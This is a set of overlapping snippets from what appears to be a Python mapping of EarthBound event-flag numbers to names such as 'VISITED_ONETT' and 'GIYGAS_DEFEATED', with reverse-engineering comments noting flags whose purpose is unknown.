'GOT_MAGIC_TRUFFLE_5', 444:", "191: 'CONQUERED_SANCTUARY_2', 192: 'CONQUERED_SANCTUARY_4', 193: 'CONQUERED_SANCTUARY_3', 194: 'CONQUERED_SANCTUARY_5', 195: 'CONQUERED_SANCTUARY_6', 196: 'CONQUERED_SANCTUARY_7', 197:", "'VENUS_AND_RUNAWAY_FANS_AT_TOPOLLA', # Visibility flag for NPCs #851 and #852 760: 'PHASE_DISTORTER_MUSIC', # 761", "(Montague at beginning of expanded mine?) # 55 (Also related to Montague... AND", "244: 'SHOP_THREED_BAKERY', 245: 'SHOP_WINTERS_DRUGSTORE', 246: 'SHOP_LAB_CAVE_BOY', 247: 'SHOP_GRAPEFRUIT_FALLS', 248: 'SHOP_SATURN_EQUIPMENT', 249: 'SHOP_SATURN_PENDANTS', 250:", "'PHOTO_POOS_PALACE_INSIDE_AVAILABLE', 499: 'PHOTO_POOS_PALACE_OUTSIDE_AVAILABLE', 500: 'PHOTO_STONEHENGE_AVAILABLE', 501: 'PHOTO_SUMMERS_HOTEL_AVAILABLE', 502: 'PHOTO_FOURSIDE_RESTAURANT_AVAILABLE', 503: 'PHOTO_SUMMERS_BEACH_AVAILABLE', 504: 'PHOTO_TOTO_AVAILABLE',", "738: 'GOT_MONEY_FROM_TWOSON_HOTEL_GUY_AT_TABLE', 739: 'PAULAS_DAD_RAN_IN_FRONT_OF_TWOSON_HOTEL', 740: 'PEOPLE_IN_THREED_ABSENT', 741: 'MONOTOLI_AT_48TH_FLOOR', 742: 'LARDNA_AT_HOME', 743: 'VISITED_HAPPY_HAPPY_VILLAGE', 744:", "you 391: 'GUARDIAN_HIEROGLYPH_2_DEFEATED', # The second Hieroglyph Guardian doesn't reference this flag and", "18: 'BUZZ_BUZZ_IN_PARTY', 19: 'SLEEPING_KING_ABSENT', 20: 'PICKY_IN_PARTY', 21: 'POKEY_IN_PARTY', 22: 'BUBBLE_MONKEY_IN_PARTY', 23: 'TONY_JOINS', 24:", "'SENTRY_ROBOT_4_DEFEATED', 361: 'SENTRY_ROBOT_5_DEFEATED', 362: 'SENTRY_ROBOT_6_DEFEATED', 363: 'SHARK_OUTSIDE_ARCADE_1_DEFEATED', 364: 'SHARK_OUTSIDE_ARCADE_2_DEFEATED', 365: 'SHARK_AT_ARCADE_ABSENT', 366: 'SLIMY_LITTLE_PILE_1_DEFEATED_AND_THREED_BLOND_GUY_BY_TENT_ABSENT',", "(???) 597: 'SHOP_SCARABA_BAZAAR_FOOD', 598: 'SHOP_SCARABA_WATER', 599: 'SHOP_SOUTH_SCARABA_VARIETY', 600: 'SHOP_DEEP_DARKNESS_BUSINESSMAN', 601: 'SHATTERED_MAN_1_DEFEATED', 602: 'SHATTERED_MAN_2_DEFEATED',", "512: 'HAS_EXIT_MOUSE', 513: 'ONETT_POST_METEORITE_MUSIC', 514: 'JUST_RESTED_AT_HOME', 515: 'FRANK_DEFEATED', 516: 'MONKEY_CAVE_PENCIL_ERASED', 517: 'NESS_ROOM_LIGHTS_ON', 518:", "Mr. Carpainter) 176: 'HEALER_SOFTEN', 177: 'HEALER_PURIFY', 178: 'HEALER_RESTORE_FEELING', 179: 'LARGE_PIZZA_DELIVERY', 180: 'PIZZA_DELIVERY', 181:", "216: 'VISITED_DALAAM', 217: 'VISITED_SCARABA', 218: 'VISITED_DEEP_DARKNESS', 219: 'VISITED_TENDA_VILLAGE', 220: 'VISITED_UNDERWORLD', 221: 'UNUSED_BRAIN_FOOD_LUNCH', 222:", "this battle 387: 'MOONSIDE_CAFE_ROBO_PUMP_DEFEATED', 388: 'MOONSIDE_MUSEUM_ROBO_PUMP_DEFEATED', 389: 'MOONSIDE_HOSPITAL_ABSTRACT_ART_DEFEATED', 390: 'GUARDIAN_HIEROGLYPH_1_DEFEATED', # The first", "'RUNAWAY_FIVE_FREE_MUSIC', 537: 'TESSIE_MUSIC', # 538 (???) 539: 'GIVEN_PLAYERS_NAME', # 540 (???) 541: 'OPENED_THREED_CEMETERY_UNDREGROUND_DOOR',", "yes/no on death. TODO: Investigate) 476: 'POLICE_BARRIERS_AT_ONETT_HILLTOP', 477: 'NESS_SLEEPING_AT_HIS_BED', 478: 'SHOP_SCARABA_CONDIMENTS', 479: 'PHOTO_NESS_HOUSE_AVAILABLE',", "near (0x02A0, 0x0D70) in a radius of 16 pixels) 346: 'GAVE_RUBY_TO_HIEROGLYPHS_GUY', 347: 'PYRAMID_HOLE_OPEN',", "maybe) 435: 'GUARDIAN_GENERAL_DEFEATED', 436: 'SEA_OF_EDEN_KRAKEN_1_DEFEATED', 437: 'SEA_OF_EDEN_KRAKEN_2_DEFEATED', 438: 'SEA_OF_EDEN_KRAKEN_3_DEFEATED', 439: 'GOT_MAGIC_TRUFFLE_1', 440: 'GOT_MAGIC_TRUFFLE_2',", "(???) 530: 'TRACY_NOT_AT_HER_ROOM', 531: 'TRACY_DOWNSTAIRS', 532: 'NESS_ROOM_METEORITE_FALLING_MUSIC', 533: 'NESS_ROOM_METEORITE_CRASH_MUSIC', 534: 'CITY_BUS_MUSIC', 535: 'RUNAWAY_BUS_OR_SKY_RUNNER_FALLING_MUSIC',", "24: 'DUNGEON_MAN_JOINS', 25: 'FLYING_MAN_1_JOINS', 26: 'FLYING_MAN_2_JOINS', 27: 'FLYING_MAN_3_JOINS', 28: 'FLYING_MAN_4_JOINS', 29: 'FLYING_MAN_5_JOINS', 30:", "Set after Apple Kid calls you about the Gourmet Yogurt Machine) # 377", "Threed?) # 589 (Visibility flag for some Hotel Attendant?) 590: 'HAPPY_THREED_PEOPLE', 591: 'CHARRED_MONKEY_OUTSIDE_JACKIES_CAFE',", "'HIDE_TWOSON_TO_THREED_TOWN_MAP', 570: 'HIDE_THREED_DRUGSTORE_TOWN_MAP', 571: 'HIDE_THREED_HOTEL_TOWN_MAP', # 572 (???) 573: 'HIDE_THREED_BAKERY_TOWN_MAP', 574: 'HIDE_THREED_HOSPITAL_TOWN_MAP', 575:", "about talking to Paula's dad and not talking to Everdred) 612: 'EVERDRED_NOT_AT_ROOF', 613:", "'TELEPORT_MONKEY_NOT_AT_CAVE', 614: 'TELEPORT_MONKEY_NEAR_MONKEY_CAVE_ENTRANCE', 615: 'TELEPORT_MONKEY_NEAR_DESERT_ROAD', 616: 'TENDAKRAUT_STOLEN', 617: 'MAGIC_CAKE_LADY_AT_BEACH', 618: 'GOT_ERASER_ERASER', # 619", "'STAR_MASTER_NEXT_TO_MU', # 596 (???) 597: 'SHOP_SCARABA_BAZAAR_FOOD', 598: 'SHOP_SCARABA_WATER', 599: 'SHOP_SOUTH_SCARABA_VARIETY', 600: 'SHOP_DEEP_DARKNESS_BUSINESSMAN', 601:", "'VISITED_UNDERWORLD', 221: 'UNUSED_BRAIN_FOOD_LUNCH', 222: 'UNUSED_REFRESHING_HERB', 223: 'GOT_PHASE_DISTORTER_HORN_OF_LIFE', 224: 'SHOP_SOLD_OLD_EQUIPMENT', 225: 'SHOP_SOLD_ITEM', # 226", "581: 'HIDE_SCARABA_SHOP_TOWN_MAP', 582: 'HIDE_SUMMERS_HOTEL_TOWN_MAP', 583: 'HIDE_SUMMERS_RESTAURANT_TOWN_MAP', 584: 'HIDE_SUMMERS_SHOP_TOWN_MAP', 585: 'HIDE_SUMMERS_HOSPITAL_TOWN_MAP', 586: 'HIDE_TOTO_SHOP_TOWN_MAP', 587:", "726: 'GOT_PHOTO_SCARABA_OASIS', 727: 'GOT_PHOTO_DEEP_DARKNESS', 728: 'GOT_PHOTO_TENDA_VILLAGE', 729: 'GOT_PHOTO_SATURN_VALLEY_FINAL', 730: 'TALKED_TO_ONETT_BAKERY_LADY_TWICE', 731: 'SHOP_UNDERWORLD_TENDA', 732:", "'TALKED_TO_ROCK_BELOW_TENDA_VILALGE', 650: 'GOT_MONKEYS_LOVE', 651: 'UNDERWORLD_TENDA_GATE_OPEN', 652: 'USED_CARROT_KEY', 653: 'SHOP_DEEP_DARKNESS_ARMS_DEALER', 654: 'DEEP_DARKNESS_BUSINESSMAN_PAID_DOCTORS_FEE', 655: 'SKY_RUNNER_MUSIC',", "'GOT_WAD_OF_BILLS', 86: 'GOT_FRANKLIN_BADGE', 87: 'GOT_FLY_HONEY', 88: 'GOT_BAD_KEY_MACHINE', 89: 'GOT_SHYNESS_BOOK', 90: 'GOT_DIAMOND', 91: 'GOT_SIGNED_BANANA',", "'LIER_INSIDE_CAVE_1', 33: 'LIER_INSIDE_CAVE_2', 34: 'PICKY_AT_HIS_ROOM', 35: 'POKEY_AT_HIS_ROOM', 36: 'COP_AT_ENTERTAINERS_SHACK', 37: 'ALOYSIUS_AT_HOME', 38: 'FIVE_COPS_AT_POLICE_STATION',", "never fights you 392: 'GUARDIAN_HIEROGLYPH_3_DEFEATED', 393: 'GUARDIAN_HIEROGLYPH_4_DEFEATED', 394: 'GUARDIAN_HIEROGLYPH_5_DEFEATED', 395: 'GUARDIAN_HIEROGLYPH_6_DEFEATED', 396: 'GUARDIAN_HIEROGLYPH_7_DEFEATED',", "# 287 (Something about Lake Tess color palette) 288: 'USED_HAWK_EYE', 289: 'ONETT_COP_1_DEFEATED', 290:", "The second Hieroglyph Guardian doesn't reference this flag and never fights you 392:", "503: 'PHOTO_SUMMERS_BEACH_AVAILABLE', 504: 'PHOTO_TOTO_AVAILABLE', 505: 'PHOTO_SCARABA_BAZAAR_AVAILABLE', 506: 'PHOTO_PYRAMID_AVAILABLE', 507: 'PHOTO_SCARABA_OASIS_AVAILABLE', 508: 'PHOTO_DEEP_DARKNESS_AVAILABLE', 509:", "kicked out of Pokey's Room in the Monotoli Building? 626: 'MEN_ABOUT_TO_ENTER_CIRCUS_TENT', 627: 'TRACY_HAS_SOUND_STONE',", "'EVERDRED_OUTSIDE_CAFE', 61: 'MAGIC_CAKE_LADY_IDENTIFIED', 62: 'DUNGEON_MAN_IN_DESERT', 63: 'PATH_TO_MANI_MANI_OPEN', 64: 'FRANKYSTEIN_MKII_DEFEATED', # 65 (???) 66:", "167: 'MOONSIDE_COUNTDOWN_GUY_2', 168: 'MOONSIDE_COUNTDOWN_GUY_3', 169: 'PHASE_DISTORTER_V2_BEING_FINISHED', # 170 (???) 171: 'GOT_SATURN_LIFENOODLES', 172: 'GOT_SATURN_COIN',", "'OPENED_THREED_CEMETERY_UNDREGROUND_DOOR', 542: 'SAILING_OR_SUBMARINE_MUSIC', 543: 'SAILING_POST_KRAKEN_MUSIC', 544: 'WINTERS_MUSIC', 545: 'LAST_MELODY_AT_LILLIPUT_STEPS', 546: 'LAST_MELODY_AT_MILKY_WELL', 547: 'LAST_MELODY_AT_PINK_CLOUD',", "'PHOTO_SCAM_HOUSE_AVAILABLE', 481: 'PHOTO_CYCLE_SHOP_AVAILABLE', 482: 'PHOTO_PEACEFUL_REST_VALLEY_AVAILABLE', 483: 'PHOTO_HAPPY_HAPPY_CABIN_AVAILABLE', 484: 'PHOTO_CHAOS_THEATER_AVAILABLE', 485: 'PHOTO_LAKE_TESS_AVAILABLE', 486: 'PHOTO_BRICK_ROAD_DUNGEON_AVAILABLE',", "'VISITED_ONETT', 210: 'VISITED_TWOSON', 211: 'VISITED_THREED', 212: 'VISITED_WINTERS', 213: 'VISITED_SATURN_VALLEY', 214: 'VISITED_FOURSIDE', 215: 'VISITED_SUMMERS',", "'POKEY_OUTSIDE_HH_HQ', 45: 'POKEY_OUTSIDE_PAULA_CABIN', 46: 'ZOMBIE_CHICK_OUTSIDE_HOTEL', 47: 'BROKEN_SKYRUNNER_THREED', 48: 'FIXED_SKYRUNNER_THREED', 49: 'BOOGEY_TENT_IN_THREED', 50: 'BRICK_ROAD_OUTSIDE_DUNGEON',", "421: 'BRICK_ROAD_DUNGEON_MOUSE_2_DEFEATED', 422: 'ONETT_DAYTIME', 423: 'UNDERWORLD_TALKING_ROCK_STOPPED_TALKING', 424: 'TENDA_SHOP_PLAIN_ROLL_1', 425: 'TENDA_SHOP_PLAIN_YOGURT', 426: 'TENDA_SHOP_PLAIN_ROLL_2', 427:", "'SHOP_FOURSIDE_DEPT_BURGER', 262: 'SHOP_FOURSIDE_DEPT_CONDIMENTS', 263: 'SHOP_FOURSIDE_DEPT_ARMS_DEALER', 264: 'SHOP_FOURSIDE_PUNK_GUY', 265: 'SHOP_SUMMERS_SHOP', 266: 'SHOP_SUMMERS_RESTAURANT', 267: 'SHOP_TOTO_SHOP',", "jam?) # 371 (???) 372: 'PARTY_IS_ROBOTIFIED', # 373 (Unknown. Related to Boogey Tent)", "564: 'HIDE_TWOSON_HOTEL_TOWN_MAP', 565: 'HIDE_TWOSON_DEPT_STORE_TOWN_MAP', 566: 'HIDE_TWOSON_TO_ONETT_TOWN_MAP', 567: 'HIDE_TWOSON_BUS_STOP_TOWN_MAP', 568: 'HIDE_TWOSON_HOSPITAL_TOWN_MAP', 569: 'HIDE_TWOSON_TO_THREED_TOWN_MAP', 570:", "CONFIRM 592: 'MONKEY_OUTSIDE_JACKIES_CAFE', # TODO: CONFIRM 593: 'POO_TELEPORTING_TO_SUMMERS', 594: 'BLOND_GUY_IN_FOURSIDE', # TODO: CONFIRM", "'GOT_PHOTO_NESS_HOUSE', 699: 'GOT_PHOTO_SCAM_HOUSE', 700: 'GOT_PHOTO_CYCLE_SHOP', 701: 'GOT_PHOTO_PEACEFUL_REST_VALLEY', 702: 'GOT_PHOTO_HAPPY_HAPPY_CABIN', 703: 'GOT_PHOTO_CHAOS_THEATER', 704: 'GOT_PHOTO_LAKE_TESS',", "360: 'SENTRY_ROBOT_4_DEFEATED', 361: 'SENTRY_ROBOT_5_DEFEATED', 362: 'SENTRY_ROBOT_6_DEFEATED', 363: 'SHARK_OUTSIDE_ARCADE_1_DEFEATED', 364: 'SHARK_OUTSIDE_ARCADE_2_DEFEATED', 365: 'SHARK_AT_ARCADE_ABSENT', 366:", "# 230 (I hate multipurpose flags) # 231 (I hate multipurpose flags) #", "392: 'GUARDIAN_HIEROGLYPH_3_DEFEATED', 393: 'GUARDIAN_HIEROGLYPH_4_DEFEATED', 394: 'GUARDIAN_HIEROGLYPH_5_DEFEATED', 395: 'GUARDIAN_HIEROGLYPH_6_DEFEATED', 396: 'GUARDIAN_HIEROGLYPH_7_DEFEATED', 397: 'GUARDIAN_HIEROGLYPH_8_DEFEATED', 398:", "'POKEY_WAITING_AT_DOOR', # 302 (???) 303: 'BUZZ_BUZZ_DYING_ON_FLOOR', 304: 'KING_AWAKE_AT_HOME', # 305 (???) 306: 'LIER_INSIDE_CAVE_3',", "602: 'SHATTERED_MAN_2_DEFEATED', 603: 'MINI_BARF_DEFEATED', 604: 'GOT_KEY_TO_THE_LOCKER', 605: 'USED_KEY_TO_THE_LOCKER', 606: 'DUNGEON_MAN_OPEN', # 607 (Unknown.", "in a radius of 16 pixels) 346: 'GAVE_RUBY_TO_HIEROGLYPHS_GUY', 347: 'PYRAMID_HOLE_OPEN', 348: 'GOT_HAWK_EYE', 349:", "184: 'GOT_MELODY_RAINY_CIRCLE', 185: 'GOT_MELODY_MILKY_WELL', 186: 'GOT_MELODY_MAGNET_HILL', 187: 'GOT_MELODY_PINK_CLOUD', 188: 'GOT_MELODY_LUMINE_HALL', 189: 'GOT_MELODY_FIRE_SPRING', 190:", "149: 'POO_STARTS_HIS_JOURNEY', # 150 (Related to Poo's journey) 151: 'QUEST_TO_SUBMARINE', 152: 'PYRAMID_DANCE_IN_PROGRESS', 153:", "'GOT_ENTERTAINERS_TRAVEL_CHARM', 79: 'GOT_METEORITE_PIECE', 80: 'GOT_KEY_TO_SHACK', 81: 'HAS_BICYCLE', 82: 'GOT_RECEIVER_PHONE', 83: 'GOT_PENCIL_ERASER', 84: 'GOT_HAND_AID',", "'TRACY_HAS_SOUND_STONE', 628: 'PRESENTS_AT_SATURN_VALLEY', 629: 'PARTY_IS_DIRTY_FROM_BELCH_FIGHT', 630: 'BUBBLE_MONKEY_AT_LAKE_TESS', 631: 'TALKED_TO_MOONSIDE_MONOTOLI', 632: 'MONSTERS_IN_ONETT', 633: 'LIERS_HOUSE_UNLOCKED',", "225: 'SHOP_SOLD_ITEM', # 226 (I hate multipurpose flags) # 227 (I hate multipurpose", "'POLICE_BARRIERS_AT_ONETT_HILLTOP', 477: 'NESS_SLEEPING_AT_HIS_BED', 478: 'SHOP_SCARABA_CONDIMENTS', 479: 'PHOTO_NESS_HOUSE_AVAILABLE', 480: 'PHOTO_SCAM_HOUSE_AVAILABLE', 481: 'PHOTO_CYCLE_SHOP_AVAILABLE', 482: 'PHOTO_PEACEFUL_REST_VALLEY_AVAILABLE',", "'GUARDIAN_HIEROGLYPH_9_DEFEATED', 399: 'GUARDIAN_HIEROGLYPH_10_DEFEATED', 400: 'GUARDIAN_HIEROGLYPH_11_DEFEATED', 401: 'GUARDIAN_HIEROGLYPH_12_DEFEATED', 402: 'GUARDIAN_HIEROGLYPH_13_DEFEATED', 403: 'GUARDIAN_HIEROGLYPH_14_DEFEATED', 404: 'GUARDIAN_HIEROGLYPH_15_DEFEATED',", "-- Got kicked out of Pokey's Room in the Monotoli Building? 626: 'MEN_ABOUT_TO_ENTER_CIRCUS_TENT',", "174: 'DESERT_MINE_EXPANDED', # 175 (Unknown. Set when you receive the Pencil Eraser. Cleared", "640: 'HIDE_FOURSIDE_TO_DESERT_TOWN_MAP', 641: 'HIDE_THREED_TO_DESERT_TOWN_MAP', 642: 'HIDE_THREED_TO_TWOSON_TOWN_MAP', 643: 'READY_TO_LOOK_AT_PHOTO_ALBUM', 644: 'GOT_SATURN_RIBBON', 645: 'ESCARGO_EXPRESS_PICK_UP', 646:", "(Unknown. Set when arriving in Threed, cleared when defeating Belch) 762: 'DUNGEON_MAN_GOODBYE_EXIT_SIGN', 763:", "147 (Venus at Topolla?) 148: 'READ_HIEROGLYPHS', 149: 'POO_STARTS_HIS_JOURNEY', # 150 (Related to Poo's", "'TEMP_1', 2: 'TEMP_2', 3: 'TEMP_3', 4: 'TEMP_4', 5: 'TEMP_5', 6: 'TEMP_6', 7: 'TEMP_7',", "'GIYGAS_DEFEATED', 74: 'NESS_NIGHTMARE_DEFEATED', 75: 'MANI_MANI_DEFEATED', 76: 'GOT_TRACY_COOKIE', 77: 'GOT_MR_BASEBALL_CAP', 78: 'GOT_ENTERTAINERS_TRAVEL_CHARM', 79: 'GOT_METEORITE_PIECE',", "571: 'HIDE_THREED_HOTEL_TOWN_MAP', # 572 (???) 573: 'HIDE_THREED_BAKERY_TOWN_MAP', 574: 'HIDE_THREED_HOSPITAL_TOWN_MAP', 575: 'HIDE_FOURSIDE_HOSPITAL_TOWN_MAP', 576: 'HIDE_FOURSIDE_DEPT_STORE_TOWN_MAP',", "'ENTERTAINERS_SHACK_UNLOCKED', 109: 'ONETT_COP_DIALOGUE', # 110 (???) 111: 'VISITED_PEACEFUL_REST_PENCIL', 112: 'INVESTED_IN_APPLE_KID', 113: 'STUBBY_LEGS', 114:", "hotel room 299: 'IRON_ERASER_ERASED', 300: 'ZOMBIE_GUARDS_AWAY', 301: 'POKEY_WAITING_AT_DOOR', # 302 (???) 303: 'BUZZ_BUZZ_DYING_ON_FLOOR',", "'GUARDIAN_MOLE_TEXT_2', 520: 'GUARDIAN_MOLE_TEXT_3', 521: 'GUARDIAN_MOLE_TEXT_4', # 522 (Multipurpose?) # 523 (Multipurpose?) 524: 'YOUR_SANCTUARY_MUSIC',", "at Topolla?) 148: 'READ_HIEROGLYPHS', 149: 'POO_STARTS_HIS_JOURNEY', # 150 (Related to Poo's journey) 151:", "454: 'MONKEY_CAVE_PIZZA_1', 455: 'MONKEY_CAVE_PROTEIN_DRINK', 456: 'MONKEY_CAVE_PIZZA_2', 457: 'MONKEY_CAVE_HAMBURGER_1', 458: 'MONKEY_CAVE_HAMBURGER_2', 459: 'MONKEY_CAVE_KING_BANANA', 460:", "'EVERDRED_AT_HIS_HOUSE', # 625 (Something about \"Fancy Pokey\" in the Monotoli Building) -- Got", "396: 'GUARDIAN_HIEROGLYPH_7_DEFEATED', 397: 'GUARDIAN_HIEROGLYPH_8_DEFEATED', 398: 'GUARDIAN_HIEROGLYPH_9_DEFEATED', 399: 'GUARDIAN_HIEROGLYPH_10_DEFEATED', 400: 'GUARDIAN_HIEROGLYPH_11_DEFEATED', 401: 'GUARDIAN_HIEROGLYPH_12_DEFEATED', 402:", "444: 'KING_JOINS', 445: 'TALKED_TO_BRICK_ROADS_HEAD', 446: 'FOR_SALE_SIGN_CUSTOMER_1', # 447 (???) # 448 (???) 449:", "540 (???) 541: 'OPENED_THREED_CEMETERY_UNDREGROUND_DOOR', 542: 'SAILING_OR_SUBMARINE_MUSIC', 543: 'SAILING_POST_KRAKEN_MUSIC', 544: 'WINTERS_MUSIC', 545: 'LAST_MELODY_AT_LILLIPUT_STEPS', 546:", "related to Montague... AND STONEHENGE??) # 56 (Unknown) 57: 'FOURSIDE_DEPT_BLACKOUT', 58: 'FOURSIDE_SEWERS_OPEN', 59:", "# The second Hieroglyph Guardian doesn't reference this flag and never fights you", "'PICKY_IN_PARTY', 21: 'POKEY_IN_PARTY', 22: 'BUBBLE_MONKEY_IN_PARTY', 23: 'TONY_JOINS', 24: 'DUNGEON_MAN_JOINS', 25: 'FLYING_MAN_1_JOINS', 26: 'FLYING_MAN_2_JOINS',", "this flag and never fights you 391: 'GUARDIAN_HIEROGLYPH_2_DEFEATED', # The second Hieroglyph Guardian", "(Visibility flag for some Hotel Attendant?) 590: 'HAPPY_THREED_PEOPLE', 591: 'CHARRED_MONKEY_OUTSIDE_JACKIES_CAFE', # TODO: CONFIRM", "150 (Related to Poo's journey) 151: 'QUEST_TO_SUBMARINE', 152: 'PYRAMID_DANCE_IN_PROGRESS', 153: 'TENDA_VILLAGE_UNDERGROUND_OPEN', 154: 'TALKED_TO_TENDA_CHIEF',", "# (Another flag for Starman DX defeated. One of them might be responsible", "'DIAMOND_TO_BE_DELIVERED', 273: 'MU_TRAINING_COMPLETE', 274: 'DUNGEON_MAN_AT_PALM_TREES', 275: 'LEARNED_TELEPORT', 276: 'MASTER_BARF_DEFEATED', 277: 'GUARDIAN_MOLE_1_DEFEATED', 278: 'GUARDIAN_MOLE_2_DEFEATED',", "'TESSIE_EMERGES', 130: 'TALKED_TO_ANDONUTS_2', 131: 'WATERFALL_WAIT_ENABLED', 132: 'QUEST_TO_ZEXONYTE', 133: 'PHASE_DISTORTER_V2_OPEN', 134: 'DELIVERED_ZEXONYTE', 135: 'TALKED_TO_BLACK_SESAME_SEED',", "'MONKEY_CAVE_HAMBURGER_2', 459: 'MONKEY_CAVE_KING_BANANA', 460: 'MONKEY_CAVE_HAMBURGER_3', 461: 'MONKEY_CAVE_FRESH_EGG', 462: 'MONKEY_CAVE_RULER', 463: 'TALKED_TO_FRESH_EGG_GIVING_MONKEY', 464: 'GOT_KING_BANANA',", "630: 'BUBBLE_MONKEY_AT_LAKE_TESS', 631: 'TALKED_TO_MOONSIDE_MONOTOLI', 632: 'MONSTERS_IN_ONETT', 633: 'LIERS_HOUSE_UNLOCKED', 634: 'PAULA_TELEPATHY_DREAM_1', 635: 'PAULA_TELEPATHY_DREAM_2', 636:", "does this differ from 72?) # 283 (???) 284: 'PEACEFUL_REST_PENCIL_ERASED', 285: 'TALKED_TO_APPLE_KID_CAVE_OF_THE_PRESENT', #", "427: 'TENDA_SHOP_SPICY_JERKY', 428: 'TENDA_SHOP_BAG_OF_DRAGONITE', 429: 'TENDA_SHOP_TALISMAN_COIN', 430: 'TENDA_SHOP_HALL_OF_FAME_BAT', # 431 (???) 432: 'DEBUG_SKIP_SANDWICH_DX',", "16: 'POO_JOINS', 17: 'POO_LEARNING_STARSTORM', 18: 'BUZZ_BUZZ_IN_PARTY', 19: 'SLEEPING_KING_ABSENT', 20: 'PICKY_IN_PARTY', 21: 'POKEY_IN_PARTY', 22:", "481: 'PHOTO_CYCLE_SHOP_AVAILABLE', 482: 'PHOTO_PEACEFUL_REST_VALLEY_AVAILABLE', 483: 'PHOTO_HAPPY_HAPPY_CABIN_AVAILABLE', 484: 'PHOTO_CHAOS_THEATER_AVAILABLE', 485: 'PHOTO_LAKE_TESS_AVAILABLE', 486: 'PHOTO_BRICK_ROAD_DUNGEON_AVAILABLE', 487:", "489: 'PHOTO_SATURN_VALLEY_COFFEE_AVAILABLE', 490: 'PHOTO_CIRCUS_TENT_AVAILABLE', 491: 'PHOTO_BLACK_SESAME_SEED_AVAILABLE', 492: 'PHOTO_DESERT_MINE_AVAILABLE', 493: 'PHOTO_FOURSIDE_BRIDGE_AVAILABLE', 494: 'PHOTO_FOURSIDE_MUSEUM_OUTSIDE_AVAILABLE', 495:", "620: 'APPLE_MOUSE_AT_WINTERS_LAB', 621: 'MONKEYS_AT_WINTERS_LAB', 622: 'BUBBLE_MONKEYS_WIFE_AT_WINTERS', 623: 'PUNK_GUY_OUTSIDE_HIS_HOUSE_THREED', 624: 'EVERDRED_AT_HIS_HOUSE', # 625 (Something", "# 769 (Checked when you talk to Tracy after defeating Giygas, but never", "'GUARDIAN_MOLE_TEXT_4', # 522 (Multipurpose?) # 523 (Multipurpose?) 524: 'YOUR_SANCTUARY_MUSIC', # 525 (???) 526:", "272: 'DIAMOND_TO_BE_DELIVERED', 273: 'MU_TRAINING_COMPLETE', 274: 'DUNGEON_MAN_AT_PALM_TREES', 275: 'LEARNED_TELEPORT', 276: 'MASTER_BARF_DEFEATED', 277: 'GUARDIAN_MOLE_1_DEFEATED', 278:", "'QUEUE_OUTSIDE_CHAOS_THEATER', 550: 'GOT_SUPORMA', 551: 'GAVE_FOOD_TO_APPLE_KID', 552: 'GOT_ZOMBIE_PAPER', 553: 'GOT_BACKSTAGE_PASS', 554: 'GOT_YOGURT_DISPENSER', 555: 'FOURSIDE_DEPT_LIGHTS_OUT',", "multipurpose flags) # 231 (I hate multipurpose flags) # 232 (I hate multipurpose", "'GOT_KEY_TO_THE_LOCKER', 605: 'USED_KEY_TO_THE_LOCKER', 606: 'DUNGEON_MAN_OPEN', # 607 (Unknown. Related to desert mine?) 608:", "for Starman DX defeated. One of them might be responsible only for palette", "206: 'FLYING_MAN_3_DEAD', 207: 'FLYING_MAN_4_DEAD', 208: 'FLYING_MAN_5_DEAD', 209: 'VISITED_ONETT', 210: 'VISITED_TWOSON', 211: 'VISITED_THREED', 212:", "469: 'POLICE_AT_METEORITE', 470: 'TALKED_TO_TRACY_AT_HER_ROOM', 471: 'TALKED_TO_MOM', 472: 'TALKED_TO_POKEY_AT_METEORITE', 473: 'TRACY_AT_HALLWAY', 474: 'NESS_MOM_OUTSIDE', #", "desert mine?) 608: 'DESERT_MINE_TO_EXPAND_NEXT_NIGHT', 609: 'WINTERS_PENCIL_ERASED', 610: 'DETECTIVE_IN_THREED', # 611 (Something about talking", "'SHOP_TOTO_SHOP', 268: 'SHOP_SUMMERS_GELATO', 269: 'SHOP_MAGIC_CAKE_LADY', 270: 'SHOP_DALAAM_RESTAURANT', 271: 'SHOP_SCARABA_HASSANS_SHOP', 272: 'DIAMOND_TO_BE_DELIVERED', 273: 'MU_TRAINING_COMPLETE',", "50: 'BRICK_ROAD_OUTSIDE_DUNGEON', 51: 'SHYNESS_BOOK_AT_LIBRARY', 52: 'CAPTIVES_AT_STONEHENGE', 53: 'TALKED_TO_BRICK_ROAD', # 54 (Montague at beginning", "'JUST_RESTED', 384: 'GOT_ALL_MELODIES', 385: 'GOT_CONTACT_LENS', 386: 'MOONSIDE_ENRAGED_FIRE_PLUG_DEFEATED', # Unused, there's no NPC attached", "702: 'GOT_PHOTO_HAPPY_HAPPY_CABIN', 703: 'GOT_PHOTO_CHAOS_THEATER', 704: 'GOT_PHOTO_LAKE_TESS', 705: 'GOT_PHOTO_BRICK_ROAD_DUNGEON', 706: 'GOT_PHOTO_THREED_CEMETERY', 707: 'GOT_PHOTO_GRAPEFRUIT_FALLS', 708:", "'RUNAWAY_BUS_FROM_TWOSON_TO_THREED', 310: 'POKEY_WAITING_AT_COUCH', 311: 'WINTERS_ROPE_LOWERED', 312: 'GHOSTS_BLOCKING_THREED', # 313 (Unknown. Something about the", "'LAKE_TESS_WIND_BLOWING', # 345 (Related to Lake Tess. This is only set if you're", "actually save your game. WHAT?) 805: 'PRESENT_CRACKED_BAT', 829: 'PRESENT_TONY_COOKIE_1', 830: 'PRESENT_TONY_COOKIE_2', 831: 'PRESENT_TONY_COOKIE_3',", "324: 'SHOP_RED_SNAKE', 325: 'SHOP_SCARABA_BAZAAR_EQUIPMENT', 326: 'SHOP_SCARABA_HOTEL_ARMS_DEALER', 327: 'PHASE_DISTORTER_V3_AT_CAVE_OF_THE_PRESENT', 328: 'ANDONUTS_AT_CAVE_OF_THE_PRESENT_1', 329: 'APPLE_KID_AT_CAVE_OF_THE_PRESENT', 330:", "104: 'POKEY_PUNISHED', 105: 'PATH_TO_TWOSON_OPEN', # 106 (???) 107: 'ONETT_SUNRISE', 108: 'ENTERTAINERS_SHACK_UNLOCKED', 109: 'ONETT_COP_DIALOGUE',", "(???) # 164 (???) 165: 'INVISIBLE_MAN_JOINS', 166: 'MOONSIDE_COUNTDOWN_GUY_1', 167: 'MOONSIDE_COUNTDOWN_GUY_2', 168: 'MOONSIDE_COUNTDOWN_GUY_3', 169:", "548: 'LAST_MELODY_AT_FIRE_SPRING', 549: 'QUEUE_OUTSIDE_CHAOS_THEATER', 550: 'GOT_SUPORMA', 551: 'GAVE_FOOD_TO_APPLE_KID', 552: 'GOT_ZOMBIE_PAPER', 553: 'GOT_BACKSTAGE_PASS', 554:", "'FOR_SALE_SIGN_CUSTOMER_3', 648: 'FOR_SALE_SIGN_CUSTOMER_4', 649: 'TALKED_TO_ROCK_BELOW_TENDA_VILALGE', 650: 'GOT_MONKEYS_LOVE', 651: 